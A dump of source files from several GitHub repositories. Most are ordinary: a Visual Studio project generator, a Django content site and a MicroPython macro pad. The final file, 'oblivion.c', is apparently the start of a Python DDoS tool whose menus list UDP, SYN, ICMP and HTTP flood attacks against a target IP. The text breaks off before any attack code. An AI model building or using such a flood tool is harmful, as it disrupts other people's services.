GetVisualStudioPlatformName():\n\t\t\"\"\"\n\t\tGet the name that is recognizeable by Visual Studio for the current platform.\n\n\t\t:return: Visual Studio platform name.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \"ORBIS\"\n\n\t@staticmethod\n\tdef GetOutputExtensionIfDebuggable(projectOutputType):\n\t\t\"\"\"\n\t\tGet the file extension of the input project output type for the current platform.\n\t\tOnly applies to debuggable projects. Any other project types should return `None`.\n\n\t\t:param projectOutputType: Final output type of a project.\n\t\t:type projectOutputType: any\n\n\t\t:return: Application extension.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn {\n\t\t\tcsbuild.ProjectType.Application: \".elf\",\n\t\t}.get(projectOutputType, None)\n\n\t@staticmethod\n\tdef GetIntellisenseAdditionalOptions(project, buildSpec):\n\t\t\"\"\"\n\t\tGet any additional NMake options to configure intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: Additional NMake options.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \"$(ORBISIntelliSense)\"\n\n\tdef WriteGlobalImportTargets(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite global import target needed for the project.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\n\t\timportGroupXmlNode = self._addXmlNode(parentXmlNode, \"ImportGroup\")\n\t\timportGroupXmlNode.set(\"Condition\", \"'$(Platform)'=='{}'\".format(vsPlatformName))\n\n\t\timportXmlNode = self._addXmlNode(importGroupXmlNode, \"Import\")\n\t\timportXmlNode.set(\"Condition\", r\"'$(ConfigurationType)' == 'Makefile' and Exists('$(VCTargetsPath)\\Platforms\\$(Platform)\\SCE.Makefile.$(Platform).targets')\")\n\t\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Platforms\\$(Platform)\\SCE.Makefile.$(Platform).targets\")\n\n\tdef WriteProjectConfiguration(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the project configuration nodes for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tprojectConfigXmlNode = self._addXmlNode(parentXmlNode, \"ProjectConfiguration\")\n\t\tprojectConfigXmlNode.set(\"Include\", vsBuildTarget)\n\n\t\tconfigXmlNode = self._addXmlNode(projectConfigXmlNode, \"Configuration\")\n\t\tconfigXmlNode.text = vsConfig\n\n\t\tplatformXmlNode = self._addXmlNode(projectConfigXmlNode, \"Platform\")\n\t\tplatformXmlNode.text = vsPlatformName\n\n\tdef WriteConfigPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes for the project's configuration and platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tpropertyGroupXmlNode = self._addXmlNode(parentXmlNode, \"PropertyGroup\")\n\t\tpropertyGroupXmlNode.set(\"Label\", \"Configuration\")\n\t\tpropertyGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\tplatformToolsetXmlNode = self._addXmlNode(propertyGroupXmlNode, \"PlatformToolset\")\n\t\tplatformToolsetXmlNode.text = \"Clang\"\n\n\t\tconfigTypeXmlNode = self._addXmlNode(propertyGroupXmlNode, \"ConfigurationType\")\n\t\tconfigTypeXmlNode.text = \"Makefile\"\n\n\tdef WriteImportProperties(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite any special import properties for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\timportGroupXmlNode = self._addXmlNode(parentXmlNode, \"ImportGroup\")\n\t\timportGroupXmlNode.set(\"Label\", \"PropertySheets\")\n\t\timportGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\timportXmlNode = self._addXmlNode(importGroupXmlNode, \"Import\")\n\t\timportXmlNode.set(\"Label\", \"LocalAppDataPlatform\")\n\t\timportXmlNode.set(\"Project\", r\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\")\n\t\timportXmlNode.set(\"Condition\", r\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\")\n\n\tdef WriteUserDebugPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes specifying the user debug settings.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tpropertyGroupXmlNode = self._addXmlNode(parentXmlNode, \"PropertyGroup\")\n\t\tpropertyGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\tworkingDirXmlNode = self._addXmlNode(propertyGroupXmlNode, \"LocalDebuggerWorkingDirectory\" )\n\t\tworkingDirXmlNode.text = \"$(OutDir)\"\n\n\t\tdebuggerFlavorXmlNode = self._addXmlNode(propertyGroupXmlNode, \"DebuggerFlavor\" )\n\t\tdebuggerFlavorXmlNode.text = \"ORBISDebugger\"\n" } ]
110
vaaceves/Repositorio_UniversidadEmpresa
https://github.com/vaaceves/Repositorio_UniversidadEmpresa
0d9d46866d39f1b9ec4d0115dbcad46a075224fd
05c7b69121aeb0e8411b57f27018f6a5c41c06d9
85547b34a053fc23406d821207c7d2601dec9679
refs/heads/master
2017-08-03T01:28:08.919027
2017-03-03T21:33:53
2017-03-03T21:33:53
81,608,867
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8565656542778015, "alphanum_fraction": 0.8565656542778015, "avg_line_length": 246.5, "blob_id": "27503b70d6d98f4016311528a665a8df0caf5e80", "content_id": "4545f8ea916041b138a092985e70b24dc4c54103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 495, "license_type": "no_license", "max_line_length": 461, "num_lines": 2, "path": "/README.md", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "# Repositorio_UniversidadEmpresa\nLa Red Universidad-Empresa ALCUE ha acumulado a traves de sus eventos una cantidad grande de publicaciones, articulos y presentaciones creadas por diversos investigadores y academicos de instituciones de educacion superior, instituciones gubernamentales y asociaciones civiles. Esta plataforma esta dedicada a difundir este conocimiento de forma organizada y gratuita. Logrando una facil consulta, dandole credito a los autores e instituciones correspondientes.\n" }, { "alpha_fraction": 0.6458333134651184, "alphanum_fraction": 0.6461004018783569, "avg_line_length": 42.348838806152344, "blob_id": "5cb5428e234e177c24be780704ad8cc72aafaa93", "content_id": "636955e9b2af5c66a183ced157b5ce4b13b90200", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 3744, "license_type": "no_license", "max_line_length": 112, "num_lines": 86, "path": "/env/project_src/home/views.py", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom models import Autor, Evento, Tematica, Libro, Pais, Clasificacion, Contenido\n#importamos las vistas genericas de django, para crear, actualizar y eliminar\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom forms import FormCrearContenido\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.template import defaultfilters\nfrom django.http import HttpResponse\n\n# Create your views here.\n\n\ndef index(request):\n # Construct a dictionary to pass to template engine as it context\n # Note the key boldmessage is the same as {{ boldmessage }} in the template\n all_content = Contenido.objects.all().order_by('-id')[:3] # traemos todos los contenidos\n all_tematicas = Tematica.objects.all()#para la navbar, muestra todas las tematicas para enlace\n context_dict = {\n 'boldmessage' : \"Bienvenidos!\",\n 'content_list': all_content,\n 'tematica_list' : all_tematicas\n }\n\n # Return a rendered response to send to the client.\n # We make use of the shortcut function to make our lives easier.\n # Note that the first parameter is the template we wish to use.\n return render(request, 'home/index.html', context=context_dict)\n #return HttpResponse(\"Repositorio Universidad-Empresa <br> - <a href='/repositorio/about/'> Acerca de </a>\")\n\n#----------------------------------------------------\ndef about(request):\n all_tematicas = Tematica.objects.all() # para la navbar, muestra todas las tematicas para enlace\n context_dict = {\n 'tematica_list': all_tematicas\n }\n return render(request, 'home/about.html',context=context_dict)\n #return HttpResponse(\"Acerca del Repositorio Universidad-Empresa <br> <a href='/home/'> Regresar </a> \")\n\n#----------------------------------------------------\ndef all_content(request):\n #hara la gestion para mostrar todas las publicaciones\n all_content = Contenido.objects.all().order_by('-id')#traemos todos los contenidos\n all_tematicas = Tematica.objects.all() # para la navbar, muestra todas las tematicas para enlace\n #first_author = Contenido.autores.all()\n context = {\n 'content_list':all_content,\n 'tematica_list': all_tematicas\n #'primer_autor': first_author\n }\n return render(request, 'home/all.html', context)\n\n#----------------------------------------------------\ndef content_detail(request, slug):\n #mostrara detalles de cada contenido en especifico\n content = Contenido.objects.get(slug=slug)#traemos los detalles\n all_tematicas = Tematica.objects.all() # para la navbar, muestra todas las tematicas para enlace\n context = {\n 'this_content': content,\n 'tematica_list': all_tematicas\n } #this_content = a un contenido en especifico a mostrar\n return render(request, 'home/contenido.html', context)\n\n\n#----------------------------------------------------\n#vistas genericas\n#----------------------------------------------------\nclass ContentCreateView(CreateView):\n \"\"\"con esta vista generica, tenemos la logica\n para agregar nuevo contenido\"\"\"\n model = Contenido\n #caracteristicas especiales para el form de crear\n form_class = FormCrearContenido\n template_name = 'home/vista_contenido.html'\n\n#----------------------------------------------------\nclass ContentUpdateView(UpdateView):\n #nos permite actualizar un contenido en especifico\n model = Contenido\n form_class = FormCrearContenido\n template_name = 'home/vista_contenido.html'\n\n#----------------------------------------------------\nclass ContentDeleteView(DeleteView):\n #nos permite eliminar un contenido en especifico\n model = Contenido\n success_url = reverse_lazy('home:index')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6817010045051575, "alphanum_fraction": 0.6817010045051575, "avg_line_length": 58.769229888916016, "blob_id": "b63e0bc9a856929847d18cb368478255e188c95f", "content_id": "7a0af240e592da5df0d2c0ce35468af00a3d27f2", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 776, "license_type": "no_license", "max_line_length": 129, "num_lines": 13, "path": "/env/project_src/home/urls.py", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom home import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),#url inicio\n url(r'^about/', views.about, name='about'),#url acerca de\n url(r'^all/$', views.all_content, name='all'),#url para lista de todos los contenidos\n url(r'^(?P<slug>[-\\w\\d]+)/$', views.content_detail, name='content-detail'),#url para contenido en especifico con sus detalles\n #url para vistas genericas\n url(r'^new/publicar$', views.ContentCreateView.as_view(), name='publicar'),#publicar contenido\n url(r'^(?P<slug>[-\\w\\d]+)/actualizar/$', views.ContentUpdateView.as_view(), name='actualizar'),#actualizar contenido\n url(r'^(?P<slug>[-\\w\\d]+)/eliminar/$', views.ContentDeleteView.as_view(), name=\"eliminar\"),#eliminar contenido\n]" }, { "alpha_fraction": 0.7824074029922485, "alphanum_fraction": 0.7824074029922485, "avg_line_length": 42.20000076293945, "blob_id": "2680ab64ac41c8d6d8417901c1b6aad25cf8746b", "content_id": "f8c7771088e66d00c0641e40aabc576604bdec34", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Python", "length_bytes": 216, "license_type": "no_license", "max_line_length": 109, "num_lines": 5, "path": "/env/Scripts/django-admin.py", "repo_name": "vaaceves/Repositorio_UniversidadEmpresa", "src_encoding": "UTF-8", "text": "#!c:\\users\\celso\\desktop\\respositoriouniversidadempresa\\respositoriouniversidadempresa\\env\\scripts\\python.exe\nfrom django.core import management\n\nif __name__ == \"__main__\":\n management.execute_from_command_line()\n" } ]
4
toeyjed/Cp353_Webtect
https://github.com/toeyjed/Cp353_Webtect
299808922b1169621b5851351935542b25b4686f
839d5ae5e1f32905b22423ef16582878cb98451d
12db374a0631f075c9fb2b6418e8ccdc7b079a32
refs/heads/main
2023-02-26T15:44:54.241485
2021-01-22T17:44:29
2021-01-22T17:44:29
331,956,425
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6525821685791016, "alphanum_fraction": 0.6619718074798584, "avg_line_length": 25.4375, "blob_id": "9926fd5c5310069dc54f634eaa776e55b1fa98ec", "content_id": "8f21ec8708551e2987e2e8215064a0697aa72c98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 61, "num_lines": 16, "path": "/03-templates/app1/app-1/app1.py", "repo_name": "toeyjed/Cp353_Webtect", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\n\napp = Flask(__name__)\n\[email protected]('/name/<user>')\ndef hello(user):\n return render_template('hello.html',name =user)\n\[email protected]('/grade/<int:score>')\ndef grade(score):\n return render_template('grade.html',marks =score)\n\[email protected]('/detail')\ndef detail():\n my_dict = {\"brand\":\"Ford\", \"model\":\"Mustang\",\"year\":1964}\n return render_template('detail.html',data = my_dict)\n\n\n\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.7954545617103577, "avg_line_length": 21, "blob_id": "5fb902edb5250498868a95e6856bb7945ba5b811", "content_id": "14c2caedabe0aefaafaa6822655d5c918065a261", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "toeyjed/Cp353_Webtect", "src_encoding": "UTF-8", "text": "# Cp353_Webtect\n2/2563 Cp353 Web Technology\n" } ]
2
dough10/MX-Macro-Pad-Micropython
https://github.com/dough10/MX-Macro-Pad-Micropython
eb1dcf77a6e7b9b118ae1f6b6ce2325d06d4970e
1d0131a6d902bfc8de7ea1a18d1b6fb95b0571ed
413fe6713a7873d5b5130fd63a502063d7b2fe0f
refs/heads/master
2023-07-15T11:05:51.088481
2021-08-24T17:11:12
2021-08-24T17:11:12
375,987,199
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.727554202079773, "alphanum_fraction": 0.7507739663124084, "avg_line_length": 29.33333396911621, "blob_id": "6ae0bcc32cb0f7af6af13b281aed49d30d5e3252", "content_id": "1992bdc5c7345c1ab19ea117f874f8c3da7936b5", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 646, "license_type": "permissive", "max_line_length": 138, "num_lines": 21, "path": "/README.md", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "# mx-macro-pad-micropython V:1.0.1\n\r\nrewrite of [MX-Macro-Pad](https://github.com/dough10/MX-Macro-Pad) for Arduino AVR in Micropython for the Raspberry pi Pico.\r\n\r\nmicropython doesn't currently have support for usb-hid on pi pico board atm. this project is bassicly boiler plate for when it is working.\n\n## install\r\n\r\n1. write files from src folder to your pico board\r\n2. assign the pins for leds, buttons and encoder in main.py\r\n3. plug up leds, buttons and encoder\r\n4. watch lights blink and keypresses register in pico console\r\n\n## Dependencies\n\nNo Dependencies\n\n## Dev Dependencies\n\n- jsdoc-to-markdown: ^7.0.1\n- version-incrementer: ^0.1.1\n" }, { "alpha_fraction": 0.6227757930755615, "alphanum_fraction": 0.6227757930755615, "avg_line_length": 21.58333396911621, "blob_id": "e5bae6a40836182dc00fd87e1034d00010c8d53c", "content_id": "ab9755f7d40dc14e06462cc5c5b9f2cf1725961f", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "permissive", "max_line_length": 42, "num_lines": 12, "path": "/src/lib/data.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from machine import UART\r\n\r\nclass DATA:\r\n def __init__(self, leds, buttons, knob):\r\n self.leds = leds\r\n self.buttons = buttons.buttons\r\n print('data init')\r\n\r\n def process(self):\r\n for button in self.buttons:\r\n if button.isPressed():\r\n print(button.index)" }, { "alpha_fraction": 0.5197792053222656, "alphanum_fraction": 0.5446181893348694, "avg_line_length": 29.114286422729492, "blob_id": "7e433c2b83dfefcb87516a0005a4b03560487da0", "content_id": "c088b874c1a71c25b80b7f21e439d01a2423ee46", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "permissive", "max_line_length": 66, "num_lines": 35, "path": "/src/lib/encoder.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from lib.rotary_irq_rp2 import RotaryIRQ\r\n\r\nclass ENCODER: \r\n def __init__(self, pins, leds, __function_state):\r\n self.__knob = RotaryIRQ(\r\n pin_num_clk=pins[0],\r\n pin_num_dt=pins[1],\r\n min_val=0,\r\n max_val=65025,\r\n reverse=False,\r\n range_mode=RotaryIRQ.RANGE_UNBOUNDED,\r\n pull_up=True)\r\n self.__value = self.__knob.value()\r\n self.__function_state = __function_state\r\n self.LEDS = leds\r\n\r\n def check(self):\r\n newVal = self.__knob.value()\r\n if newVal != self.__value:\r\n if newVal > self.__value:\r\n if self.__function_state[0]:\r\n if self.LEDS.brightness > 0 and self.LEDS.mode == 0:\r\n self.LEDS.brightness -= 4335\r\n print(self.LEDS.brightness)\r\n else :\r\n print('up')\r\n if newVal < self.__value:\r\n if self.__function_state[0]:\r\n if self.LEDS.brightness < 65025 and self.LEDS.mode == 0:\r\n self.LEDS.brightness += 4335\r\n print(self.LEDS.brightness)\r\n else :\r\n print('down')\r\n self.__value = newVal\r\n print('')" }, { "alpha_fraction": 0.6691729426383972, "alphanum_fraction": 0.6992481350898743, "avg_line_length": 31.149999618530273, "blob_id": "b65969b59e0dbf7ea1579083b67ef70143b6f47d", "content_id": "147249e4e3d96d7823e39f021826fc0865c1bdb8", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "permissive", "max_line_length": 126, "num_lines": 20, "path": "/src/main.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n\r\nfrom lib.button_controller import BUTTON_CONTROLLER\r\nfrom lib.led_controller import LED_CONTROLLER\r\nfrom lib.encoder import ENCODER\r\n\r\n# index 0 button = index 0 led and index 0 keys\r\nled_pins = [0,1,2,3,4]\r\nbutton_pins = [5,6,7,8,9,10]\r\nencoder_pins = [11,12]\r\nkeys = [\"up\",\"down\",\"left\",\"right\",\"enter\",\"\"] # blank string at keys[5] is needed \r\n\r\nleds = LED_CONTROLLER(led_pins)\r\nbuttons = BUTTON_CONTROLLER(button_pins, leds, keys) # pass in leds object so buttons can control leds and their indexes match\r\nknob = ENCODER(encoder_pins, leds, buttons.function_state)\r\n\r\nwhile True:\r\n knob.check()\r\n buttons.check()\r\n leds.shineOn()\r\n\r\n" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.607692301273346, "avg_line_length": 29.97101402282715, "blob_id": "348f3dc9aa9856b25c9f00f9b43f056b448476ad", "content_id": "6ffcc326fa1e86ddde695005931311e168734316", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2210, "license_type": "permissive", "max_line_length": 79, "num_lines": 69, "path": "/src/lib/led_controller.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from machine import Pin, PWM\r\n\r\nclass LED_CONTROLLER:\r\n def __init__(self, pins):\r\n self.LEDS = []\r\n self.brightnesses = []\r\n self.mode = 0\r\n self.keyPressed = False\r\n self.brightness = 0\r\n self.__currentLED = 1\r\n self.__krIncriment = 765\r\n self.__krBrightness = 65025 - self.__krIncriment\r\n self.__changeBy = -1\r\n self.__clickIncriment = 25\r\n self.__breathIncriment = 9\r\n self.__breathBrightness = 0\r\n for pin in pins:\r\n pwm = PWM(Pin(pin))\r\n pwm.freq(1000)\r\n pwm.duty_u16(65025)\r\n self.LEDS.append(pwm)\r\n self.brightnesses.append(65025)\r\n\r\n def setMode(self, mode):\r\n self.mode = mode\r\n\r\n def shineOn(self):\r\n if self.mode == 0:\r\n self.__variableBrightness()\r\n if self.mode == 1:\r\n self.__onPressMode()\r\n if self.mode == 2:\r\n self.__breath()\r\n if self.mode == 3:\r\n self.__KnightRider()\r\n if self.mode == 4:\r\n self.__off()\r\n\r\n def __off(self):\r\n for led in self.LEDS:\r\n led.duty_u16(-2)\r\n\r\n def __variableBrightness(self):\r\n for led in self.LEDS:\r\n led.duty_u16(self.brightness)\r\n\r\n def __breath(self):\r\n for led in self.LEDS:\r\n led.duty_u16(self.__breathBrightness)\r\n self.__breathBrightness = self.__breathBrightness + self.__breathIncriment\r\n if self.__breathBrightness <= 0 or self.__breathBrightness >= 65025:\r\n self.__breathIncriment = -self.__breathIncriment\r\n\r\n def __onPressMode(self):\r\n for num, brightness in enumerate(self.brightnesses, start=0):\r\n self.LEDS[num].duty_u16(self.brightnesses[num])\r\n if brightness < 65025 and not self.keyPressed:\r\n self.brightnesses[num] = self.brightnesses[num] + self.__clickIncriment\r\n\r\n def __KnightRider(self):\r\n self.LEDS[self.__currentLED].duty_u16(self.__krBrightness)\r\n if (self.__krBrightness >= 65025):\r\n self.__krIncriment = -self.__krIncriment\r\n if (self.__currentLED >= 4 or self.__currentLED <= 0):\r\n self.__changeBy = -self.__changeBy\r\n self.__currentLED = self.__currentLED + self.__changeBy\r\n if (self.__krBrightness <= 0):\r\n self.__krIncriment = -self.__krIncriment\r\n self.__krBrightness = self.__krBrightness + self.__krIncriment\r\n " }, { "alpha_fraction": 0.650306761264801, "alphanum_fraction": 0.6523517370223999, "avg_line_length": 28.6875, "blob_id": "700353b95009ff0f1e601c82b5a7fbf15a21ba7e", "content_id": "9f9a67ab0b305079b098e91536cae57716584a44", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 489, "license_type": "permissive", "max_line_length": 85, "num_lines": 16, "path": "/src/lib/button_controller.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from lib.button import Button\r\n\r\n# places button objects in an array \r\nclass BUTTON_CONTROLLER:\r\n def __init__(self, pins, leds, keys):\r\n self.buttons = []\r\n self.function_state = [\r\n False\r\n ]\r\n for index, pin in enumerate(pins, start=0):\r\n self.buttons.append(Button(pin, leds, index, self.function_state, keys[index]))\r\n\r\n # checks all buttons in button array to see if they are pressed\r\n def check(self):\r\n for button in self.buttons:\r\n button.update()" }, { "alpha_fraction": 0.5886379480361938, "alphanum_fraction": 0.5927447080612183, "avg_line_length": 32.02325439453125, "blob_id": "123b0cc462a3cc90a0dff54a30fca3e8d4fb776d", "content_id": "a8ce1a078f699782e65c0bda87c639867ccc1f93", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1461, "license_type": "permissive", "max_line_length": 227, "num_lines": 43, "path": "/src/lib/button.py", "repo_name": "dough10/MX-Macro-Pad-Micropython", "src_encoding": "UTF-8", "text": "from machine import Pin\r\n\r\nclass Button:\r\n def __init__(self, pin, leds, index, __function_state, key):\r\n self.pin = Pin(pin, Pin.IN, Pin.PULL_UP)\r\n self.debounceTime = 0\r\n self.lastPressed = 0\r\n self.LEDS = leds\r\n self.index = index\r\n self.key = key\r\n self.__pressed = False\r\n self.__function_state = __function_state\r\n\r\n def __press(self, state):\r\n if state == self.__pressed:\r\n return\r\n self.__pressed = state;\r\n # light up the button pressed when in onPress mode\r\n if state and self.LEDS.mode == 1:\r\n try:\r\n self.LEDS.brightnesses[self.index] = 0\r\n except IndexError:\r\n pass\r\n # encoder button does not have LED tied to it toggles led mode \r\n try: \r\n self.LEDS.LEDS[self.index] ## checking if there is a led tied to the button index (ie. is it the encoder button)\r\n self.LEDS.keyPressed = state\r\n if self.__function_state[0]:\r\n self.LEDS.mode = self.index\r\n return\r\n ## actual key press command here\r\n print(\"Button: \", self.pin, \", LED: \", self.LEDS.LEDS[self.index], \", Key: \" + self.key + \", Pressed\") if state else print(\"Button: \", self.pin, \", LED: \", self.LEDS.LEDS[self.index], \", Key: \" + self.key + \", Released\")\r\n print('')\r\n ##\r\n except IndexError:\r\n self.__function_state[0] = state\r\n return\r\n\r\n def isPressed(self):\r\n return self.__pressed\r\n\r\n def update(self):\r\n self.__press(not self.pin.value())" } ]
7
bakeman-enr/oblivion-homeholder
https://github.com/bakeman-enr/oblivion-homeholder
4b28169f7ee2ed6497fe7ab94ec5657a5b20dd03
c9bac6845924f03b89490a9e899e5ffa6100c9d0
b31bf9f133ca1a3afe49e99d7cde35ab2d9320b8
refs/heads/main
2023-07-04T14:21:46.699773
2021-08-12T21:28:13
2021-08-12T21:28:13
384,004,545
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.4582735002040863, "alphanum_fraction": 0.5279971361160278, "avg_line_length": 29.480226516723633, "blob_id": "9cbf17eddac0c3f2f84a3a21304e8c0012eb7aae", "content_id": "b9c5bc60aaf5fca2f2c477335d9aa1768fc03651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13036, "license_type": "no_license", "max_line_length": 110, "num_lines": 354, "path": "/oblivion.c", "repo_name": "bakeman-enr/oblivion-homeholder", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\nimport sys\r\nimport socket\r\nimport time\r\nimport random\r\nimport threading\r\nimport getpass\r\nimport os\r\n\r\nmethods = \"\"\"\\033[35m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[35mATTACK METHODS\\033[34m ║ \r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35mUDP (IP) (PORT) (TIME) (SIZE) \\033[34m|\\033[34m UDP Attack.\\033[34m ║\r\n║ \\033[34mSYN (IP) (PORT) (TIME) (SIZE) \\033[35m|\\033[35m SYN Attack.\\033[35m ║\r\n║ \\033[35mICMP (IP) (PORT) (TIME) (SIZE) \\033[34m|\\033[34m ICMP Attack.\\033[34m ║\r\n║ \\033[34mHTTP (IP) (PORT) (TIME) (SIZE) \\033[35m|\\033[35m HTTP Attack.\\033[35m ║\r\n╚══════════════════════════════════════════════════════╝\\033[34m\r\n\"\"\"\r\n\r\ninfo = \"\"\"\\033[35m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[34m Info\\033[35m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[34m[+] oblivion Was Made By plasxz.\\033[35m ║\r\n║ \\033[35m[+] Discord: plasxz#7260.\\033[34m ║\r\n║ \\033[34m[+] Instagram: plasxz.\\033[35m ║\r\n║ \\033[35m[+] YouTube: falling time.\\033[34m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nextras = \"\"\"\\033[34m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[35mExtras\\033[34m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35mattacks \\033[35m|\\033[35m Shows How Many Running Attacks.\\033[36m ║\r\n║ \\033[34mstop \\033[34m|\\033[34m Stops All Running Attacks.\\033[35m ║\r\n║ \\033[35mresolve (website) \\033[35m|\\033[35m Grabs A Domains IP.\\033[36m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nhelp = 